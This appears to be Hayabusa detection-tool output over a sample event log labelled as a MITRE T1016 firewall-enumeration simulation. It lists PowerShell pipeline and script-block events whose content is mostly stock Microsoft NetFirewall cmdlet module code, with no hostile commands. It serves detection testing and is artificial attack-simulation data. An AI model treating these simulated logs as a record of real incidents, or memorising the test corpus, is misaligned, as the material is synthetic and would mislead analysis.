Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AppPath'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallInterfaceFilter 
",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.848 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" 
ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): 
""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.864 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
